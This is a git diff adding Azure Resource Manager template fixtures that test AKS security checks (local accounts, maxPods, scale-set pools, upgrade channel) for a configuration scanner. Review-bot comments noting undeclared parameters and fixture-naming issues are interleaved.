--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSLocalAdminDisabled/pass.json
@@ -0,0 +1,28 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.ContainerService/managedClusters",
+ "apiVersion": "2018-06-01",
+ "name": "pass",
+ "properties": {
+ "resourceType": "Microsoft.ContainerService/managedClusters",
+ "agentPoolProfiles": [
+ {
+ "name": "default",
+ "count": 1,
+ "vmSize": "Standard_D2_v2"
+ }
+ ],
+ "identity": {
+ "type": "SystemAssigned"
+ },
+ "disableLocalAccounts": true
+ },
+ "tags": {
+ "Environment": "Production"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AKSMaxPodsMinimum/agentPoolProfiles_with_maxPods_fail4.json b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/agentPoolProfiles_with_maxPods_fail4.json
new file mode 100644
index 00000000000..e8b2f7c39db
--- /dev/null
+++ b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/agentPoolProfiles_with_maxPods_fail4.json
@@ -0,0 +1,134 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.5.6.12127", + "templateHash": "12705365244308198684" + } + }, + "parameters": { + "aksClusterName": { + "type": "string", + "defaultValue": "aks101cluster-vmss", + "metadata": { + "description": "The name of the Managed Cluster resource." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of AKS resource." + } + }, + "dnsPrefix": { + "type": "string", + "metadata": { + "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN." + } + }, + "osDiskSizeGB": { + "type": "int", + "defaultValue": 0, + "maxValue": 1023, + "minValue": 0, + "metadata": { + "description": "Disk size (in GiB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize." + } + }, + "agentCount": { + "type": "int", + "defaultValue": 3, + "maxValue": 100, + "minValue": 1, + "metadata": { + "description": "The number of nodes for the cluster. 1 Node is enough for Dev/Test and minimum 3 nodes, is recommended for Production" + } + }, + "agentVMSize": { + "type": "string", + "defaultValue": "Standard_D2s_v3", + "metadata": { + "description": "The size of the Virtual Machine." + } + }, + "osType": { + "type": "string", + "defaultValue": "Linux", + "allowedValues": [ + "Linux", + "Windows" + ], + "metadata": { + "description": "The type of operating system." 
+ } + } + }, + "resources": [ + { + "type": "Microsoft.ContainerService/managedClusters", + "apiVersion": "2020-03-01", + "name": "agentPoolProfiles_with_maxPods_fail4", + "location": "[parameters('location')]", + "sku": { + "name": "Basic", + "tier": "Free" + }, + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "kubernetesVersion": "[parameters('kubernetesVersion')]", + "dnsPrefix": "[variables('dnsPrefix')]", + "agentPoolProfiles":[ + { + "name": "agentpool", + "count": 3, + "vmSize": "[parameters('agentVMSize')]", + "osDiskSizeGB": "[parameters('osDiskSizeGB')]", + "maxPods": 28, + "type": "VirtualMachineScaleSets", + "orchestratorVersion": "[parameters('kubernetesVersion')]", + "mode": "System", + "osType": "Linux" + } + ] + , + "linuxProfile": { + "adminUsername": "[parameters('linuxAdminUsername')]", + "ssh": { + "publicKeys": [ + { + "keyData": "[parameters('sshRSAPublicKey')]" + } + ] + } + }, + "servicePrincipalProfile": { + "clientId": "msi" + }, + "nodeResourceGroup": "[concat('MC_', resourceGroup().name,'_', parameters('clusterName'), '_',parameters('location'))]", + "enableRBAC": true, + "networkProfile": { + "networkPlugin": "kubenet", + "loadBalancerSku": "Basic", + "podCidr": "[parameters('podCidr')]", + "serviceCidr": "[parameters('serviceCidr')]", + "dnsServiceIP": "[parameters('dnsServiceIP')]", + "dockerBridgeCidr": "[parameters('dockerBridgeCidr')]", + "outboundType": "loadBalancer" + } + } + } + + + ], + "outputs": { + "controlPlaneFQDN": { + "type": "string", + "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('aksClusterName'))).fqdn]" + } + } +} diff --git a/tests/arm/checks/resource/example_AKSMaxPodsMinimum/agentPoolProfiles_with_maxPods_pass.json b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/agentPoolProfiles_with_maxPods_pass.json new file mode 100644 index 00000000000..4184de4924f --- /dev/null 
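Review bot: agentPoolProfiles_with_maxPods_fail4.json references `parameters('kubernetesVersion')`, `parameters('clusterName')`, `parameters('linuxAdminUsername')`, `parameters('sshRSAPublicKey')`, the four CIDR/DNS parameters and `variables('dnsPrefix')`, none of which the template declares — its `parameters` block only defines `aksClusterName`, `location`, `dnsPrefix`, `osDiskSizeGB`, `agentCount`, `agentVMSize` and `osType`, and there is no `variables` section; the same holds for the other five AKSMaxPodsMinimum fixtures that follow. The `maxPods` check presumably never evaluates these expressions, so this is fixture hygiene rather than a failing test, but `nodeResourceGroup` using `parameters('clusterName')` while the resource `name` is a literal suggests the sample was trimmed without updating its references. Either declare the missing parameters or replace the expressions with literals so the fixture stays a deployable template, and while at it remove the dangling `,` that sits on its own line after the `agentPoolProfiles` array in fail4 and fail3 (valid JSON, but it reads as a leftover).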
+++ b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/agentPoolProfiles_with_maxPods_pass.json 
@@ -0,0 +1,132 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.5.6.12127", + "templateHash": "12705365244308198684" + } + }, + "parameters": { + "aksClusterName": { + "type": "string", + "defaultValue": "aks101cluster-vmss", + "metadata": { + "description": "The name of the Managed Cluster resource." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of AKS resource." + } + }, + "dnsPrefix": { + "type": "string", + "metadata": { + "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN." + } + }, + "osDiskSizeGB": { + "type": "int", + "defaultValue": 0, + "maxValue": 1023, + "minValue": 0, + "metadata": { + "description": "Disk size (in GiB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize." + } + }, + "agentCount": { + "type": "int", + "defaultValue": 3, + "maxValue": 100, + "minValue": 1, + "metadata": { + "description": "The number of nodes for the cluster. 1 Node is enough for Dev/Test and minimum 3 nodes, is recommended for Production" + } + }, + "agentVMSize": { + "type": "string", + "defaultValue": "Standard_D2s_v3", + "metadata": { + "description": "The size of the Virtual Machine." + } + }, + "osType": { + "type": "string", + "defaultValue": "Linux", + "allowedValues": [ + "Linux", + "Windows" + ], + "metadata": { + "description": "The type of operating system." 
+ } + } + }, + "resources": [ + + { + "type": "Microsoft.ContainerService/managedClusters", + "apiVersion": "2020-03-01", + "name": "agentPoolProfiles_with_maxPods_pass", + "location": "[parameters('location')]", + "sku": { + "name": "Basic", + "tier": "Free" + }, + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "kubernetesVersion": "[parameters('kubernetesVersion')]", + "dnsPrefix": "[variables('dnsPrefix')]", + "agentPoolProfiles":[ + { + "name": "agentpool", + "count": 3, + "vmSize": "[parameters('agentVMSize')]", + "osDiskSizeGB": "[parameters('osDiskSizeGB')]", + "maxPods": 51, + "type": "VirtualMachineScaleSets", + "orchestratorVersion": "[parameters('kubernetesVersion')]", + "mode": "System", + "osType": "Linux" + } + ], + "linuxProfile": { + "adminUsername": "[parameters('linuxAdminUsername')]", + "ssh": { + "publicKeys": [ + { + "keyData": "[parameters('sshRSAPublicKey')]" + } + ] + } + }, + "servicePrincipalProfile": { + "clientId": "msi" + }, + "nodeResourceGroup": "[concat('MC_', resourceGroup().name,'_', parameters('clusterName'), '_',parameters('location'))]", + "enableRBAC": true, + "networkProfile": { + "networkPlugin": "kubenet", + "loadBalancerSku": "Basic", + "podCidr": "[parameters('podCidr')]", + "serviceCidr": "[parameters('serviceCidr')]", + "dnsServiceIP": "[parameters('dnsServiceIP')]", + "dockerBridgeCidr": "[parameters('dockerBridgeCidr')]", + "outboundType": "loadBalancer" + } + } + } + ], + "outputs": { + "controlPlaneFQDN": { + "type": "string", + "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('aksClusterName'))).fqdn]" + } + } +} diff --git a/tests/arm/checks/resource/example_AKSMaxPodsMinimum/agentPoolProfiles_without_maxPods_fail3.json b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/agentPoolProfiles_without_maxPods_fail3.json new file mode 100644 index 00000000000..e335dd2a140 --- /dev/null 
+++ b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/agentPoolProfiles_without_maxPods_fail3.json 
@@ -0,0 +1,133 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.5.6.12127", + "templateHash": "12705365244308198684" + } + }, + "parameters": { + "aksClusterName": { + "type": "string", + "defaultValue": "aks101cluster-vmss", + "metadata": { + "description": "The name of the Managed Cluster resource." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of AKS resource." + } + }, + "dnsPrefix": { + "type": "string", + "metadata": { + "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN." + } + }, + "osDiskSizeGB": { + "type": "int", + "defaultValue": 0, + "maxValue": 1023, + "minValue": 0, + "metadata": { + "description": "Disk size (in GiB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize." + } + }, + "agentCount": { + "type": "int", + "defaultValue": 3, + "maxValue": 100, + "minValue": 1, + "metadata": { + "description": "The number of nodes for the cluster. 1 Node is enough for Dev/Test and minimum 3 nodes, is recommended for Production" + } + }, + "agentVMSize": { + "type": "string", + "defaultValue": "Standard_D2s_v3", + "metadata": { + "description": "The size of the Virtual Machine." + } + }, + "osType": { + "type": "string", + "defaultValue": "Linux", + "allowedValues": [ + "Linux", + "Windows" + ], + "metadata": { + "description": "The type of operating system." 
+ } + } + }, + "resources": [ + { + "type": "Microsoft.ContainerService/managedClusters", + "apiVersion": "2020-03-01", + "name": "agentPoolProfiles_without_maxPods_fail3", + "location": "[parameters('location')]", + "sku": { + "name": "Basic", + "tier": "Free" + }, + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "kubernetesVersion": "[parameters('kubernetesVersion')]", + "dnsPrefix": "[variables('dnsPrefix')]", + "agentPoolProfiles":[ + { + "name": "agentpool", + "count": 3, + "vmSize": "[parameters('agentVMSize')]", + "osDiskSizeGB": "[parameters('osDiskSizeGB')]", + "type": "VirtualMachineScaleSets", + "orchestratorVersion": "[parameters('kubernetesVersion')]", + "mode": "System", + "osType": "Linux" + } + ] + , + "linuxProfile": { + "adminUsername": "[parameters('linuxAdminUsername')]", + "ssh": { + "publicKeys": [ + { + "keyData": "[parameters('sshRSAPublicKey')]" + } + ] + } + }, + "servicePrincipalProfile": { + "clientId": "msi" + }, + "nodeResourceGroup": "[concat('MC_', resourceGroup().name,'_', parameters('clusterName'), '_',parameters('location'))]", + "enableRBAC": true, + "networkProfile": { + "networkPlugin": "kubenet", + "loadBalancerSku": "Basic", + "podCidr": "[parameters('podCidr')]", + "serviceCidr": "[parameters('serviceCidr')]", + "dnsServiceIP": "[parameters('dnsServiceIP')]", + "dockerBridgeCidr": "[parameters('dockerBridgeCidr')]", + "outboundType": "loadBalancer" + } + } + } + + + ], + "outputs": { + "controlPlaneFQDN": { + "type": "string", + "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('aksClusterName'))).fqdn]" + } + } +} diff --git a/tests/arm/checks/resource/example_AKSMaxPodsMinimum/properties_with_maxPods_fail2.json b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/properties_with_maxPods_fail2.json new file mode 100644 index 00000000000..9a9a63116b6 --- /dev/null +++ b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/properties_with_maxPods_fail2.json 
@@ -0,0 +1,97 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.5.6.12127", + "templateHash": "12705365244308198684" + } + }, + "parameters": { + "aksClusterName": { + "type": "string", + "defaultValue": "aks101cluster-vmss", + "metadata": { + "description": "The name of the Managed Cluster resource." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of AKS resource." + } + }, + "dnsPrefix": { + "type": "string", + "metadata": { + "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN." + } + }, + "osDiskSizeGB": { + "type": "int", + "defaultValue": 0, + "maxValue": 1023, + "minValue": 0, + "metadata": { + "description": "Disk size (in GiB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize." + } + }, + "agentCount": { + "type": "int", + "defaultValue": 3, + "maxValue": 100, + "minValue": 1, + "metadata": { + "description": "The number of nodes for the cluster. 1 Node is enough for Dev/Test and minimum 3 nodes, is recommended for Production" + } + }, + "agentVMSize": { + "type": "string", + "defaultValue": "Standard_D2s_v3", + "metadata": { + "description": "The size of the Virtual Machine." + } + }, + "osType": { + "type": "string", + "defaultValue": "Linux", + "allowedValues": [ + "Linux", + "Windows" + ], + "metadata": { + "description": "The type of operating system." 
+ } + } + }, + "resources": [ + { + "type": "Microsoft.ContainerService/managedClusters/agentPools", + "apiVersion": "2020-03-01", + "name": "properties_with_maxPods_fail2", + "dependsOn": [ + "[resourceId('Microsoft.ContainerService/managedClusters', parameters('clusterName'))]" + ], + "properties": { + "count": "[parameters('agentCount')]", + "vmSize": "[parameters('agentVMSize')]", + "osDiskSizeGB": "[parameters('osDiskSizeGB')]", + "maxPods": 33, + "type": "VirtualMachineScaleSets", + "orchestratorVersion": "[parameters('kubernetesVersion')]", + "mode": "System", + "osType": "Linux" + } + } + + + ], + "outputs": { + "controlPlaneFQDN": { + "type": "string", + "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('aksClusterName'))).fqdn]" + } + } +} diff --git a/tests/arm/checks/resource/example_AKSMaxPodsMinimum/properties_with_maxPods_pass1.json b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/properties_with_maxPods_pass1.json new file mode 100644 index 00000000000..2207d1c9eb7 --- /dev/null +++ b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/properties_with_maxPods_pass1.json 
@@ -0,0 +1,96 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.5.6.12127", + "templateHash": "12705365244308198684" + } + }, + "parameters": { + "aksClusterName": { + "type": "string", + "defaultValue": "aks101cluster-vmss", + "metadata": { + "description": "The name of the Managed Cluster resource." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of AKS resource." + } + }, + "dnsPrefix": { + "type": "string", + "metadata": { + "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN." + } + }, + "osDiskSizeGB": { + "type": "int", + "defaultValue": 0, + "maxValue": 1023, + "minValue": 0, + "metadata": { + "description": "Disk size (in GiB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize." + } + }, + "agentCount": { + "type": "int", + "defaultValue": 3, + "maxValue": 100, + "minValue": 1, + "metadata": { + "description": "The number of nodes for the cluster. 1 Node is enough for Dev/Test and minimum 3 nodes, is recommended for Production" + } + }, + "agentVMSize": { + "type": "string", + "defaultValue": "Standard_D2s_v3", + "metadata": { + "description": "The size of the Virtual Machine." + } + }, + "osType": { + "type": "string", + "defaultValue": "Linux", + "allowedValues": [ + "Linux", + "Windows" + ], + "metadata": { + "description": "The type of operating system." 
+ } + } + }, + "resources": [ + { + "type": "Microsoft.ContainerService/managedClusters/agentPools", + "apiVersion": "2020-03-01", + "name": "properties_with_maxPods_pass1", + "dependsOn": [ + "[resourceId('Microsoft.ContainerService/managedClusters', parameters('clusterName'))]" + ], + "properties": { + "count": "[parameters('agentCount')]", + "vmSize": "[parameters('agentVMSize')]", + "osDiskSizeGB": "[parameters('osDiskSizeGB')]", + "type": "VirtualMachineScaleSets", + "orchestratorVersion": "[parameters('kubernetesVersion')]", + "mode": "System", + "osType": "Linux", + "maxPods": 51 + } + } + + ], + "outputs": { + "controlPlaneFQDN": { + "type": "string", + "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('aksClusterName'))).fqdn]" + } + } +} diff --git a/tests/arm/checks/resource/example_AKSMaxPodsMinimum/properties_without_maxPods_fail.json b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/properties_without_maxPods_fail.json new file mode 100644 index 00000000000..89da889c457 --- /dev/null +++ b/tests/arm/checks/resource/example_AKSMaxPodsMinimum/properties_without_maxPods_fail.json 
@@ -0,0 +1,96 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.5.6.12127", + "templateHash": "12705365244308198684" + } + }, + "parameters": { + "aksClusterName": { + "type": "string", + "defaultValue": "aks101cluster-vmss", + "metadata": { + "description": "The name of the Managed Cluster resource." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of AKS resource." + } + }, + "dnsPrefix": { + "type": "string", + "metadata": { + "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN." + } + }, + "osDiskSizeGB": { + "type": "int", + "defaultValue": 0, + "maxValue": 1023, + "minValue": 0, + "metadata": { + "description": "Disk size (in GiB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize." + } + }, + "agentCount": { + "type": "int", + "defaultValue": 3, + "maxValue": 100, + "minValue": 1, + "metadata": { + "description": "The number of nodes for the cluster. 1 Node is enough for Dev/Test and minimum 3 nodes, is recommended for Production" + } + }, + "agentVMSize": { + "type": "string", + "defaultValue": "Standard_D2s_v3", + "metadata": { + "description": "The size of the Virtual Machine." + } + }, + "osType": { + "type": "string", + "defaultValue": "Linux", + "allowedValues": [ + "Linux", + "Windows" + ], + "metadata": { + "description": "The type of operating system." 
+ } + } + }, + "resources": [ + { + "type": "Microsoft.ContainerService/managedClusters/agentPools", + "apiVersion": "2020-03-01", + "name": "properties_without_maxPods_fail", + "dependsOn": [ + "[resourceId('Microsoft.ContainerService/managedClusters', parameters('clusterName'))]" + ], + "properties": { + "count": "[parameters('agentCount')]", + "vmSize": "[parameters('agentVMSize')]", + "osDiskSizeGB": "[parameters('osDiskSizeGB')]", + "type": "VirtualMachineScaleSets", + "orchestratorVersion": "[parameters('kubernetesVersion')]", + "mode": "System", + "osType": "Linux" + } + } + + + ], + "outputs": { + "controlPlaneFQDN": { + "type": "string", + "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('aksClusterName'))).fqdn]" + } + } +} diff --git a/tests/arm/checks/resource/example_AKSPoolTypeIsScaleSet/fail.json b/tests/arm/checks/resource/example_AKSPoolTypeIsScaleSet/fail.json new file mode 100644 index 00000000000..4e6c879eef1 --- /dev/null +++ b/tests/arm/checks/resource/example_AKSPoolTypeIsScaleSet/fail.json 
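Review bot: This fail fixture has the same undeclared `clusterName` and `kubernetesVersion` parameter references as the pass fixture, so it is not a valid template either and should be fixed together with it. Beyond that, the only compliant case in this set is a literal `"maxPods": 51`; real templates commonly pass the value through a parameter (`"maxPods": "[parameters('maxPods')]"` with a `defaultValue`), and a fixture of that shape would show whether the check resolves the parameter or silently treats the expression string as non-numeric. Absence of `maxPods` failing is reasonable since, as far as I know, the Azure CNI default is 30 pods per node, but that dependency on the platform default is worth a line in the check's documentation.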
@@ -0,0 +1,111 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.26.170.59819", + "templateHash": "14823542069333410776" + } + }, + "parameters": { + "clusterName": { + "type": "string", + "defaultValue": "aks101cluster", + "metadata": { + "description": "The name of the Managed Cluster resource." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of the Managed Cluster resource." + } + }, + "dnsPrefix": { + "type": "string", + "metadata": { + "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN." + } + }, + "osDiskSizeGB": { + "type": "int", + "defaultValue": 0, + "minValue": 0, + "maxValue": 1023, + "metadata": { + "description": "Disk size (in GB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize." + } + }, + "agentCount": { + "type": "int", + "defaultValue": 3, + "minValue": 1, + "maxValue": 50, + "metadata": { + "description": "The number of nodes for the cluster." + } + }, + "agentVMSize": { + "type": "string", + "defaultValue": "standard_d2s_v3", + "metadata": { + "description": "The size of the Virtual Machine." + } + }, + "linuxAdminUsername": { + "type": "string", + "metadata": { + "description": "User name for the Linux Virtual Machines." + } + }, + "sshRSAPublicKey": { + "type": "string", + "metadata": { + "description": "Configure all linux machines with the SSH RSA public key string. 
Your key should include three parts, for example 'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm'" + } + } + }, + "resources": [ + { + "type": "Microsoft.ContainerService/managedClusters", + "apiVersion": "2024-02-01", + "name": "fail", + "location": "[parameters('location')]", + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "dnsPrefix": "[parameters('dnsPrefix')]", + "agentPoolProfiles": [ + { + "name": "agentpool", + "osDiskSizeGB": "[parameters('osDiskSizeGB')]", + "count": "[parameters('agentCount')]", + "type": "AvailabilitySet", + "vmSize": "[parameters('agentVMSize')]", + "osType": "Linux", + "mode": "System" + } + ], + "linuxProfile": { + "adminUsername": "[parameters('linuxAdminUsername')]", + "ssh": { + "publicKeys": [ + { + "keyData": "[parameters('sshRSAPublicKey')]" + } + ] + } + } + } + } + ], + "outputs": { + "controlPlaneFQDN": { + "type": "string", + "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('clusterName')), '2024-02-01').fqdn]" + } + } +} diff --git a/tests/arm/checks/resource/example_AKSPoolTypeIsScaleSet/pass.json b/tests/arm/checks/resource/example_AKSPoolTypeIsScaleSet/pass.json new file mode 100644 index 00000000000..6a3c5f27348 --- /dev/null +++ b/tests/arm/checks/resource/example_AKSPoolTypeIsScaleSet/pass.json 
@@ -0,0 +1,111 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.26.170.59819", + "templateHash": "14823542069333410776" + } + }, + "parameters": { + "clusterName": { + "type": "string", + "defaultValue": "aks101cluster", + "metadata": { + "description": "The name of the Managed Cluster resource." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of the Managed Cluster resource." + } + }, + "dnsPrefix": { + "type": "string", + "metadata": { + "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN." + } + }, + "osDiskSizeGB": { + "type": "int", + "defaultValue": 0, + "minValue": 0, + "maxValue": 1023, + "metadata": { + "description": "Disk size (in GB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize." + } + }, + "agentCount": { + "type": "int", + "defaultValue": 3, + "minValue": 1, + "maxValue": 50, + "metadata": { + "description": "The number of nodes for the cluster." + } + }, + "agentVMSize": { + "type": "string", + "defaultValue": "standard_d2s_v3", + "metadata": { + "description": "The size of the Virtual Machine." + } + }, + "linuxAdminUsername": { + "type": "string", + "metadata": { + "description": "User name for the Linux Virtual Machines." + } + }, + "sshRSAPublicKey": { + "type": "string", + "metadata": { + "description": "Configure all linux machines with the SSH RSA public key string. 
Your key should include three parts, for example 'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm'" + } + } + }, + "resources": [ + { + "type": "Microsoft.ContainerService/managedClusters", + "apiVersion": "2024-02-01", + "name": "pass", + "location": "[parameters('location')]", + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "dnsPrefix": "[parameters('dnsPrefix')]", + "agentPoolProfiles": [ + { + "name": "agentpool", + "osDiskSizeGB": "[parameters('osDiskSizeGB')]", + "count": "[parameters('agentCount')]", + "type": "VirtualMachineScaleSets", + "vmSize": "[parameters('agentVMSize')]", + "osType": "Linux", + "mode": "System" + } + ], + "linuxProfile": { + "adminUsername": "[parameters('linuxAdminUsername')]", + "ssh": { + "publicKeys": [ + { + "keyData": "[parameters('sshRSAPublicKey')]" + } + ] + } + } + } + } + ], + "outputs": { + "controlPlaneFQDN": { + "type": "string", + "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('clusterName')), '2024-02-01').fqdn]" + } + } +} diff --git a/tests/arm/checks/resource/example_AKSPoolTypeIsScaleSet/pass1.json b/tests/arm/checks/resource/example_AKSPoolTypeIsScaleSet/pass1.json new file mode 100644 index 00000000000..df3b7b148d4 --- /dev/null +++ b/tests/arm/checks/resource/example_AKSPoolTypeIsScaleSet/pass1.json 
@@ -0,0 +1,110 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.26.170.59819", + "templateHash": "14823542069333410776" + } + }, + "parameters": { + "clusterName": { + "type": "string", + "defaultValue": "aks101cluster", + "metadata": { + "description": "The name of the Managed Cluster resource." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of the Managed Cluster resource." + } + }, + "dnsPrefix": { + "type": "string", + "metadata": { + "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN." + } + }, + "osDiskSizeGB": { + "type": "int", + "defaultValue": 0, + "minValue": 0, + "maxValue": 1023, + "metadata": { + "description": "Disk size (in GB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize." + } + }, + "agentCount": { + "type": "int", + "defaultValue": 3, + "minValue": 1, + "maxValue": 50, + "metadata": { + "description": "The number of nodes for the cluster." + } + }, + "agentVMSize": { + "type": "string", + "defaultValue": "standard_d2s_v3", + "metadata": { + "description": "The size of the Virtual Machine." + } + }, + "linuxAdminUsername": { + "type": "string", + "metadata": { + "description": "User name for the Linux Virtual Machines." + } + }, + "sshRSAPublicKey": { + "type": "string", + "metadata": { + "description": "Configure all linux machines with the SSH RSA public key string. 
Your key should include three parts, for example 'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm'" + } + } + }, + "resources": [ + { + "type": "Microsoft.ContainerService/managedClusters", + "apiVersion": "2024-02-01", + "name": "pass1", + "location": "[parameters('location')]", + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "dnsPrefix": "[parameters('dnsPrefix')]", + "agentPoolProfiles": [ + { + "name": "agentpool", + "osDiskSizeGB": "[parameters('osDiskSizeGB')]", + "count": "[parameters('agentCount')]", + "vmSize": "[parameters('agentVMSize')]", + "osType": "Linux", + "mode": "System" + } + ], + "linuxProfile": { + "adminUsername": "[parameters('linuxAdminUsername')]", + "ssh": { + "publicKeys": [ + { + "keyData": "[parameters('sshRSAPublicKey')]" + } + ] + } + } + } + } + ], + "outputs": { + "controlPlaneFQDN": { + "type": "string", + "value": "[reference(resourceId('Microsoft.ContainerService/managedClusters', parameters('clusterName')), '2024-02-01').fqdn]" + } + } +} diff --git a/tests/arm/checks/resource/example_AKSUpgradeChannel/fail.json b/tests/arm/checks/resource/example_AKSUpgradeChannel/fail.json new file mode 100644 index 00000000000..f1605df5665 --- /dev/null +++ b/tests/arm/checks/resource/example_AKSUpgradeChannel/fail.json 
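Review bot: `pass1` omits `type` from the agent pool entirely yet is named as a passing case, so the check treats an absent `type` as compliant; that is only correct if the API default is `VirtualMachineScaleSets`, which I believe it is for current apiVersions but is an assumption the fixture cannot assert. If the check's intent is "the pool is a scale set", absence should arguably be UNKNOWN rather than PASSED, and whichever is chosen should be deliberate. Since strict JSON leaves no room for a comment, I would at least name the file `missing_type_pass.json` so the intent is visible in the test listing.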
@@ -0,0 +1,107 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.5.6.12127", + "templateHash": "12705365244308198684" + } + }, + "parameters": { + "aksClusterName": { + "type": "string", + "defaultValue": "aks101cluster-vmss", + "metadata": { + "description": "The name of the Managed Cluster resource." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of AKS resource." + } + }, + "dnsPrefix": { + "type": "string", + "metadata": { + "description": "Optional DNS prefix to use with hosted Kubernetes API server FQDN." + } + }, + "osDiskSizeGB": { + "type": "int", + "defaultValue": 0, + "maxValue": 1023, + "minValue": 0, + "metadata": { + "description": "Disk size (in GiB) to provision for each of the agent pool nodes. This value ranges from 0 to 1023. Specifying 0 will apply the default disk size for that agentVMSize." + } + }, + "agentCount": { + "type": "int", + "defaultValue": 3, + "maxValue": 100, + "minValue": 1, + "metadata": { + "description": "The number of nodes for the cluster. 1 Node is enough for Dev/Test and minimum 3 nodes, is recommended for Production" + } + }, + "agentVMSize": { + "type": "string", + "defaultValue": "Standard_D2s_v3", + "metadata": { + "description": "The size of the Virtual Machine." + } + }, + "osType": { + "type": "string", + "defaultValue": "Linux", + 